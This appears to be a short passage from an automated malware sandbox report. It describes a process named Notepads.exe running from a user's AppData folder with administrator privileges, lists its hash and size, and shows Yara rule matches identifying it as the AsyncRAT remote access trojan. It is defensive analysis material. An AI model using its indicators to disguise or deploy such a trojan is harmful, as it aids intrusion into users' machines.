                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0xf40000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Disassembly

                                            Code Analysis
